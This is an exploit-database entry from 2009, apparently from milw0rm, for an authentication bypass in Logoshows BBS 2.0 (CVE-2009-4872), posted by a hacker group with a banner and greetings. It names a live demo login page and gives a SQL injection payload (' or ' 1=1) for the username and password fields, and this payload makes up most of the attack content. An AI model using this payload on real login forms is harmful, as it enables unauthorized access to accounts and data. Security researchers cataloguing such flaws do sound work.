Logoshows BBS 2.0 - Authentication Bypass
Author: Dns-Team
type: webapps
platform: php
port:
date_added: 2009-08-06
date_updated:
verified: 1
codes: OSVDB-64558;CVE-2009-4872
tags:
aliases:
screenshot_url:
application_url:
#############################################################################
# #
# Logoshows BBS 2.0 (Auth Bypass) SQL Injection Vulnerability #
# #
#############################################################################
#############################################################################
[~] -=[Dns-Team Marocain Hackers]=-
[~] Author: Dns-Team
[~] Contact: Q2[at]HoTmail[dot]Fr
[~] Site: www.Scam4u.com + www.Dns-Team.com
[~] Greetz: Sa4d + HSMX + Stack + PR0H4CK3RZ + N@bilX + Ga3 Réjà là Xd :)
[~] Download : http://www.logoshows.com/download/bbs88.rar
#[---------------------------------I'm Kh0K0m MÃ N!x--------------------------------------]
[»] Demo :
#
# http://www.logoshows.com/bbs/globepersonnel_login.asp
#
[»] Exploit :
#
# username : ' or ' 1=1
# password : ' or ' 1=1
#
#[------------------------------------------------------------------------------------]
# - - +- Tnx Str0ke For UR Support -+ - -
#########################################################################################################
# milw0rm.com [2009-08-07]